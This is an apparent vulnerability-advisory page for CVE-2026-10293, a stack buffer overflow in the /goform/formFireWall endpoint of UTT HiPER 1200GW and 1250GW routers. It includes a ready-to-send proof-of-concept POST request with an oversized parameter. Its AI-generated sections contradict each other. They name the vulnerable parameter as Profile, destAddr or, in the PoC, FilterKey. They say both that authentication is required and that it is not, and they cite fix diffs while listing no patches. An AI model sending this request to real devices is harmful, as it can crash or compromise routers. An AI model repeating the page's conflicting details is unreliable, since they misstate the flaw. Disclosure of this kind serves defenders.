VYPR
← All advisories
High severity8.8NVD Advisory· Published Jun 1, 2026

CVE-2026-10293

CVE-2026-10293

Description

UTT HiPER 1200GW and 1250GW routers are vulnerable to stack-based buffer overflow via the Profile parameter in formFireWall, allowing remote exploitation.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

UTT HiPER 1200GW and 1250GW routers are vulnerable to stack-based buffer overflow via the Profile parameter in formFireWall, allowing remote exploitation.

Vulnerability

A stack-based buffer overflow vulnerability exists in UTT HiPER 1200GW devices up to version 2.5.3-170306 and HiPER 1250GW devices up to version v3.2.7-210907-180535. The flaw resides in the strcpy function within the /goform/formFireWall endpoint, specifically when handling the Profile argument. User-controlled data is copied without length validation into a fixed-size buffer, leading to the overflow [1].

Exploitation

An attacker can exploit this vulnerability remotely by sending a crafted POST request to the /goform/formFireWall endpoint. The request must manipulate the Profile parameter with a string longer than the allocated buffer. Authentication is required, as indicated by the Authorization header in the provided Proof of Concept [1].

Impact

Successful exploitation of this vulnerability can lead to a denial of service (DoS) by crashing the affected service or device. Depending on the specific overflow conditions and system architecture, it may also be possible to achieve arbitrary code execution, though this is not explicitly detailed in the available references [1].

Mitigation

Patched firmware versions are not explicitly mentioned in the available references. Users are advised to check the vendor's website for updated firmware. As of the publication of this CVE, no specific mitigation or workaround has been disclosed beyond updating the firmware when available [1].

References
  1. cve/2.md at main · yuezhaoshanmu/cve

AI Insight generated on Jun 1, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

1

Patches

0

No patches discovered yet.

Vulnerability mechanics

Root cause

"The function strcpy copies user-controlled data into a fixed-size buffer on the stack without checking the data's length."

Attack vector

An unauthenticated attacker can send a specially crafted POST request to the /goform/formFireWall endpoint. This request includes an overly long string in the 'destAddr' parameter. The vulnerability is triggered when this long string is copied using strcpy, leading to a stack-based buffer overflow [CWE-121]. Remote exploitation is possible as the attack does not require any authentication or user interaction [ref_id=1].

Affected code

The vulnerability resides in the strcpy function within the /goform/formFireWall file. Specifically, user-controlled data from the 'destAddr' parameter is copied to a buffer at offset 216 within a configuration structure without any length validation [ref_id=1]. This lack of bounds checking allows for a buffer overflow.

What the fix does

The patch is not provided in the bundle. The advisory indicates that the vulnerability is caused by the use of strcpy without bounds checking when handling user-supplied input for the 'destAddr' parameter [ref_id=1]. A proper fix would involve implementing length validation before copying the data or using a safer string copying function like strncpy.

Preconditions

  • networkThe target device must be accessible over the network.
  • inputThe attacker must be able to send a POST request to the /goform/formFireWall endpoint with a manipulated 'destAddr' parameter.

Reproduction

POST /goform/formFireWall HTTP/1.1 Host: 192.168.1.1 Content-Length: 1822 Cache-Control: max-age=0 Authorization: Digest username="admin", realm="UTT", nonce="91350026511f147977ce8ea9363e038c", uri="/goform/formArpBindGlobalConfig", algorithm=MD5, response="3c90b3b4d198905f88cf1301ff8ad6b5", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000001a1, cnonce="71e33390dc75c484" Origin: http://192.168.1.1 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Referer: http://192.168.1.1/IPMac.asp Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: language=zhcn; utt_bw_rdevType=; td_cookie=9472310938 Connection: close

newname=testpolicy&oldname=oldpolicy&applyuserType=1&applyuserData=testdata&index=0&PolicyNames=testpolicy&PolicyEnables=1&ip1=192.168.1.1&ip2=192.168.1.100&destAddr=somedomain.com&destIP=ipRange&timeGrpName=always&note=test&Status=1&FilterTypes=2&FilterKey=AAAAAAAaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&Action=add [ref_id=1]

Generated on Jun 1, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

5

News mentions

0

No linked articles in our index yet.